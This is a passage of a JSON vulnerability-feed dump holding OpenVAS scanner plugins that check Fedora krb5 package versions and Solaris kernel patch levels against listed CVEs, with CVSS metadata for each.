"AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:59", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-27T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2007-034", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3084", "CVE-2006-6143"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:861421", "href": "http://plugins.openvas.org/nasl.php?oid=861421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2007-034\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora Core 5\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-January/msg00047.html\");\n script_id(861421);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-034\");\n script_cve_id(\"CVE-2006-6143\", \"CVE-2006-3084\");\n script_name( \"Fedora Update for krb5 FEDORA-2007-034\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-devel\", rpm:\"x86_64/krb5-devel~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-libs\", rpm:\"x86_64/krb5-libs~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/krb5-debuginfo\", rpm:\"x86_64/debug/krb5-debuginfo~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-workstation\", rpm:\"x86_64/krb5-workstation~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/krb5-server\", rpm:\"x86_64/krb5-server~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-server\", rpm:\"i386/krb5-server~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-libs\", rpm:\"i386/krb5-libs~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-devel\", rpm:\"i386/krb5-devel~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/krb5-debuginfo\", rpm:\"i386/debug/krb5-debuginfo~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/krb5-workstation\", rpm:\"i386/krb5-workstation~1.4.3~5.3\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:47", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 120012-14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2006-0225"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855205", "href": "http://plugins.openvas.org/nasl.php?oid=855205", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 120012-14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855205);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"120012-14\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2006-0225\");\n script_name( \"Solaris Update for kernel 120012-14\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-120012-14-1\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"i386\", patch:\"120012-14\", package:\"SUNWcpc.i SUNWsshcu SUNWpcmci SUNWnge SUNWcnetr SUNWdhcsu SUNWrcmdc SUNWperl584usr SUNWixgb SUNWpsu SUNWfss SUNWatfsu SUNWpmu SUNWlldap SUNWipfr SUNWudapltu SUNWzoner SUNWarc SUNWipfu SUNWfmd SUNWintgige SUNWscpu SUNWbtool SUNWxge SUNWsra SUNWperl584core SUNWbart SUNWkrbu SUNWsmapi SUNWtavor SUNWipfh SUNWmdb SUNWzfsu SUNWsndmr SUNWaudit SUNWncar SUNWpapi SUNWsshdu SUNWsndmu SUNWpppdu SUNWnfssu SUNWdhcm SUNWkdcu SUNWpsdir SUNWpool SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWcsl SUNWcpcu SUNWses SUNWsadmi SUNWvolu SUNWib SUNWkey SUNWnisu SUNWos86r SUNWtoo SUNWdmgtu SUNWusbu SUNWypu SUNWpoolr SUNWftduu SUNWppm SUNWuksp SUNWusb SUNWzfsr SUNWroute SUNWckr SUNWcsr SUNWdoc SUNWaudh SUNWrge SUNWtecla SUNWmdbr SUNWpcu SUNWzfskr SUNWarcr SUNWrcapu SUNWwbsup SUNWhea SUNWcakr.i SUNWqos SUNWntpu SUNWnfsckr SUNWdtrp SUNWlibsasl SUNWcslr SUNWippcore SUNWrmodr SUNWsshu SUNWcsu SUNWnfscu SUNWesu SUNWcsd SUNWipplr SUNWpsm-lpd SUNWuprl SUNWzoneu SUNWipplu SUNWrcapr SUNWdfbh SUNWftdur SUNWauda\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:32", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 120012-14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2006-0225"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855205", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855205", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 120012-14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855205\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"120012-14\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2006-0225\");\n script_name( \"Solaris Update for kernel 120012-14\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-120012-14-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"i386\", patch:\"120012-14\", package:\"SUNWcpc.i SUNWsshcu SUNWpcmci SUNWnge SUNWcnetr SUNWdhcsu SUNWrcmdc SUNWperl584usr SUNWixgb SUNWpsu SUNWfss SUNWatfsu SUNWpmu SUNWlldap SUNWipfr SUNWudapltu SUNWzoner SUNWarc SUNWipfu SUNWfmd SUNWintgige SUNWscpu SUNWbtool SUNWxge SUNWsra SUNWperl584core SUNWbart SUNWkrbu SUNWsmapi SUNWtavor SUNWipfh SUNWmdb SUNWzfsu SUNWsndmr SUNWaudit SUNWncar SUNWpapi SUNWsshdu SUNWsndmu SUNWpppdu SUNWnfssu SUNWdhcm SUNWkdcu SUNWpsdir SUNWpool SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWcsl SUNWcpcu SUNWses SUNWsadmi SUNWvolu SUNWib SUNWkey SUNWnisu SUNWos86r SUNWtoo SUNWdmgtu SUNWusbu SUNWypu SUNWpoolr SUNWftduu SUNWppm SUNWuksp SUNWusb SUNWzfsr SUNWroute SUNWckr SUNWcsr SUNWdoc SUNWaudh SUNWrge SUNWtecla SUNWmdbr SUNWpcu SUNWzfskr SUNWarcr SUNWrcapu SUNWwbsup SUNWhea SUNWcakr.i SUNWqos SUNWntpu SUNWnfsckr SUNWdtrp SUNWlibsasl SUNWcslr SUNWippcore SUNWrmodr SUNWsshu SUNWcsu SUNWnfscu SUNWesu SUNWcsd SUNWipplr SUNWpsm-lpd SUNWuprl SUNWzoneu SUNWipplu SUNWrcapr SUNWdfbh SUNWftdur SUNWauda\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:33", "description": "Check for the Version of krb5", "cvss3": {}, "published": "2009-02-16T00:00:00", "type": "openvas", "title": "Fedora Update for krb5 FEDORA-2008-2637", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-0063", "CVE-2007-2442", "CVE-2007-2798", "CVE-2007-5901", "CVE-2008-0947", "CVE-2007-4743", "CVE-2007-0957", "CVE-2007-5971", "CVE-2007-0956", "CVE-2007-1216", "CVE-2007-4000", "CVE-2007-2443", "CVE-2007-3999", "CVE-2008-0062"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:860003", "href": "http://plugins.openvas.org/nasl.php?oid=860003", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5 FEDORA-2008-2637\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"krb5 on Fedora 7\";\ntag_insight = \"Kerberos V5 is a trusted-third-party network authentication system,\n which can improve your network's security by eliminating the insecure\n practice of cleartext passwords.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00537.html\");\n script_id(860003);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-16 16:22:52 +0100 (Mon, 16 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-2637\");\n script_cve_id(\"CVE-2007-5971\", \"CVE-2007-5901\", \"CVE-2008-0062\", \"CVE-2008-0063\", \"CVE-2008-0947\", \"CVE-2007-3999\", \"CVE-2007-4743\", \"CVE-2007-4000\", \"CVE-2007-2442\", \"CVE-2007-2443\", \"CVE-2007-2798\", \"CVE-2007-0956\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_name( \"Fedora Update for krb5 FEDORA-2008-2637\");\n\n script_summary(\"Check for the Version of krb5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.1~9.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:09", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 120011-14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339", "CVE-2007-0957", "CVE-2006-0225"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855516", "href": "http://plugins.openvas.org/nasl.php?oid=855516", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 120011-14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855516);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"120011-14\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2007-0957\", \"CVE-2006-0225\", \"CVE-2005-2969\");\n script_name( \"Solaris Update for kernel 120011-14\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-120011-14-1\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"120011-14\", package:\"SUNWcakr.u SUNWsshcu SUNWpcmci SUNWcnetr SUNWcar.us SUNWdhcsu SUNWrcmdc SUNWperl584usr SUNWixgb SUNWpsu SUNWfss SUNWatfsu SUNWopenssl-include SUNWpmu SUNWlldap SUNWipfr SUNWudapltu SUNWzoner SUNWarc SUNWipfu SUNWfmd SUNWintgige SUNWscpu SUNWbtool SUNWxge SUNWidn.u SUNWsra FJSVcpcu SUNWperl584core SUNWbart SUNWkrbu SUNWdrcr.u SUNWsmapi SUNWtavor SUNWbcp SUNWipfh SUNWmdb SUNWzfsu SUNWsndmr SUNWaudit SUNWncar SUNWldomr.v SUNWiopc.v SUNWcakr.us SUNWpapi SUNWsshdu SUNWcart200.v SUNWcpr.u SUNWkvm.u SUNWsndmu SUNWpppdu SUNWnfssu SUNWdhcm SUNWkdcu SUNWmdr SUNWkvm.v SUNWkvm.us FJSVhea SUNWpool SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWus.u SUNWcsl FJSVmdbr SUNWcpcu SUNWses SUNWsadmi SUNWvolu SUNWcpc.v SUNWib SUNWkey SUNWnisu SUNWtoo SUNWsckmr SUNWdrr.u FJSVpiclu SUNWdmgtu SUNWkvmt200.v SUNWusbu SUNWefc.u SUNWpiclu SUNWypu SUNWpoolr SUNWftduu SUNWppm SUNWuksp SUNWcakr.v SUNWslpu SUNWusb SUNWcti2.u SUNWzfsr SUNWdrr.us SUNWroute SUNWckr SUNWcsr SUNWdoc SUNWefcr SUNWaudh SUNWefcl SUNWrge SUNWtecla SUNWmdbr SUNWldomu.v SUNWpcu SUNWdscpr.u SUNWzfskr SUNWarcr SUNWmdu SUNWdcsu SUNWrcapu FJSVmdb SUNWwbsup SUNWcar.v SUNWhea SUNWqos SUNWntpu SUNWnfsckr SUNWdtrp SUNWcpc.us SUNWpl5u SUNWlibsasl SUNWcslr SUNWippcore SUNWsshu SUNWdcsr SUNWcsu SUNWust1.v SUNWcar.u SUNWnfscu SUNWesu SUNWcsd SUNWfruip.u SUNWssad SUNWcpc.u SUNWipplr SUNWpsm-lpd SUNWuprl SUNWefc.us SUNWzoneu SUNWipplu SUNWrcapr SUNWdfbh SUNWwrsm.u SUNWftdur SUNWerid SUNWauda\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:47", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 120011-14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339", "CVE-2007-0957", "CVE-2006-0225"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855516", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855516", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 120011-14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855516\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"120011-14\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2007-0957\", \"CVE-2006-0225\", \"CVE-2005-2969\");\n script_name( \"Solaris Update for kernel 120011-14\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-120011-14-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"120011-14\", package:\"SUNWcakr.u SUNWsshcu SUNWpcmci SUNWcnetr SUNWcar.us SUNWdhcsu SUNWrcmdc SUNWperl584usr SUNWixgb SUNWpsu SUNWfss SUNWatfsu SUNWopenssl-include SUNWpmu SUNWlldap SUNWipfr SUNWudapltu SUNWzoner SUNWarc SUNWipfu SUNWfmd SUNWintgige SUNWscpu SUNWbtool SUNWxge SUNWidn.u SUNWsra FJSVcpcu SUNWperl584core SUNWbart SUNWkrbu SUNWdrcr.u SUNWsmapi SUNWtavor SUNWbcp SUNWipfh SUNWmdb SUNWzfsu SUNWsndmr SUNWaudit SUNWncar SUNWldomr.v SUNWiopc.v SUNWcakr.us SUNWpapi SUNWsshdu SUNWcart200.v SUNWcpr.u SUNWkvm.u SUNWsndmu SUNWpppdu SUNWnfssu SUNWdhcm SUNWkdcu SUNWmdr SUNWkvm.v SUNWkvm.us FJSVhea SUNWpool SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWus.u SUNWcsl FJSVmdbr SUNWcpcu SUNWses SUNWsadmi SUNWvolu SUNWcpc.v SUNWib SUNWkey SUNWnisu SUNWtoo SUNWsckmr SUNWdrr.u FJSVpiclu SUNWdmgtu SUNWkvmt200.v SUNWusbu SUNWefc.u SUNWpiclu SUNWypu SUNWpoolr SUNWftduu SUNWppm SUNWuksp SUNWcakr.v SUNWslpu SUNWusb SUNWcti2.u SUNWzfsr SUNWdrr.us SUNWroute SUNWckr SUNWcsr SUNWdoc SUNWefcr SUNWaudh SUNWefcl SUNWrge SUNWtecla SUNWmdbr SUNWldomu.v SUNWpcu SUNWdscpr.u SUNWzfskr SUNWarcr SUNWmdu SUNWdcsu SUNWrcapu 